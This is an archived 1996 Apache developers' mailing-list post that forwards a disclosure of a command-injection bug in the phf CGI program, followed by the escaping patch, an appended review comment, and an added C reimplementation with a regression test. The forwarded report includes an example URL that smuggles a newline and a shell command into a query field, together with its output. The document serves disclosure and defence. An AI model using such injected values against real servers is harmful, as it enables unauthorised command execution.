Posted to dev@httpd.apache.org by Rob Hartill <ha...@hyperreal.com> on 1996/02/09 05:45:51 UTC

Security problem in phf (fwd)

cgi-src/phf.c   bye bye ?

Forwarded message:
> From jmyers@marigold.eecs.nwu.edu  Mon Feb  5 17:13:11 1996
> Message-Id: <19...@marigold.eecs.nwu.edu>
> Subject: Security problem in phf
> To: jbrowne@uiuc.edu, apache-bugs@apache.org, httpd@hoohoo.ncsa.uiuc.edu
> Date: Mon, 5 Feb 1996 16:51:05 -0600 (CST)
> From: Jennifer Myers <jm...@marigold.eecs.nwu.edu>
> X-Mailer: ELM [version 2.4 PL25]
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> 
> Hello,
> 
> Both the NCSA httpd and Apache httpd distributions include a CGI
> program "phf" which is a forms-based interface to Ph servers written
> by Jim Browne <jb...@uiuc.edu>.
> 
> "phf" can be made to execute commands by inserting "%0A" (newline) into the
> URL of a phf query, followed by whatever command you wish to execute.
> 
> Example:
> 
> http://hoohoo.ncsa.uiuc.edu:80/cgi-bin/phf?Jserver=ns.uiuc.edu&Qalias=jbrowne&Qname=&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=%0Als
> ^^^^^
> 
> Output:
> ------
> Query Results
> 
> /usr/local/bin/ph -m -s ns.uiuc.edu alias=jbrowne slip= ls 
> 
> -507:slip:unknown field.
> 500:Did not understand query.
> AA
> AA.pl
> archie
> calendar
> cgi-dump
> change-passwd
> date
> donothing
> [...]
> -------
> 
> The fix is to add \x0A to the characters which escape_shell_cmd() in
> util.c will escape:
> 
> -        if(ind("&;`'\"|*?~<>^()[]{}$\\",cmd[x]) != -1){
> +        if(ind("&;`'\"|*?~<>^()[]{}$\\\x0A",cmd[x]) != -1){
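Review bot: the `-`/`+` pair keeps escape_shell_cmd() as a deny-list, so the fix covers exactly the one byte added to the string literal, and any other byte absent from that list still reaches the shell unescaped; the "Output" block above shows the whole query being run as a `/usr/local/bin/ph ...` command line, which is why the escaping matters at all. Since phf only needs ph's alias and field values passed intact, a sturdier change is either an allow-list (escape or reject everything that is not a letter, digit, or the few punctuation characters ph fields need) or invoking `/usr/local/bin/ph` through execv() with an argv array so no shell ever parses the string. Minor style point: writing the added byte as `\n` rather than `\x0A` reads more clearly in a C string literal.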
> 
> 
> Thanks,
> Jennifer Myers
>
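The report above describes the bug in two steps: a `%0A` in the query is form-decoded to a raw newline, and escape_shell_cmd() did not backslash that newline, so the shell read it as a command separator. The following is an added example (not the NCSA/Apache util.c source, and not code from the message) that reimplements the escaping routine with the before and after character lists taken from the diff, a minimal form decoder, and a regression check, `newline_reaches_shell()`, that reports whether a raw newline survives escaping. The decoder, the check function and the buffer sizes are my assumptions for illustration; the only input is the `Qslip` value from the report's own example URL.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Character list escape_shell_cmd() used before the fix, reconstructed
   from the diff in the message (a rewrite for illustration, not the
   NCSA/Apache util.c source). */
const char *OLD_SPECIALS = "&;`'\"|*?~<>^()[]{}$\\";
/* The same list with the newline the patch adds. */
const char *NEW_SPECIALS = "&;`'\"|*?~<>^()[]{}$\\\n";

/* CGI form decoding as a query parser would do it: '+' -> space,
   %XX -> byte.  Returns decoded length, or -1 on bad hex or overflow.
   (Assumed helper; phf's real parser is not shown in the message.) */
int url_decode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (; *in; in++) {
        char c = *in;
        if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            char hex[3] = { in[1], in[2], '\0' };
            c = (char)strtol(hex, NULL, 16);
            in += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (o + 1 >= outsz)
            return -1;
        out[o++] = c;
    }
    out[o] = '\0';
    return (int)o;
}

/* Backslash-escape every byte of cmd that appears in specials.
   Returns the number of bytes escaped, or -1 if out is too small. */
int escape_shell_cmd(const char *cmd, const char *specials, char *out, size_t outsz)
{
    size_t o = 0;
    int escaped = 0;
    for (; *cmd; cmd++) {
        int special = strchr(specials, *cmd) != NULL;
        if (o + (special ? 2 : 1) >= outsz)
            return -1;
        if (special) {
            out[o++] = '\\';
            escaped++;
        }
        out[o++] = *cmd;
    }
    out[o] = '\0';
    return escaped;
}

/* 1 if s still holds a newline the shell would treat as a command
   separator, i.e. one not preceded by an odd run of backslashes
   (backslash-newline is a line continuation in sh, not a separator). */
int has_raw_newline(const char *s)
{
    int backslashes = 0;
    for (; *s; s++) {
        if (*s == '\\') {
            backslashes++;
            continue;
        }
        if (*s == '\n' && backslashes % 2 == 0)
            return 1;
        backslashes = 0;
    }
    return 0;
}

/* Regression check for the fix: decode a form value, escape it with the
   given character list, and report whether a raw newline survives.
   Returns 1 (survives), 0 (neutralised) or -1 (decode/escape error). */
int newline_reaches_shell(const char *encoded_value, const char *specials)
{
    char decoded[256], escaped[512];
    if (url_decode(encoded_value, decoded, sizeof decoded) < 0)
        return -1;
    if (escape_shell_cmd(decoded, specials, escaped, sizeof escaped) < 0)
        return -1;
    return has_raw_newline(escaped);
}

int main(void)
{
    /* Constructed input: the Qslip value from the report's example URL. */
    const char *qslip = "%0Als";
    printf("old list: newline reaches shell = %d\n",
           newline_reaches_shell(qslip, OLD_SPECIALS));
    printf("new list: newline reaches shell = %d\n",
           newline_reaches_shell(qslip, NEW_SPECIALS));
    return 0;
}
```

With the old list the decoded newline passes through untouched; with the patched list it comes out as backslash-newline, which sh folds into a single word, so `slip=` and `ls` are no longer separate commands. Because both lists are deny-lists, the check only proves the fix for bytes that appear in the literal; pairing it with an allow-list test, or replacing the shell invocation with execv(), is what closes the class of bug rather than this one instance.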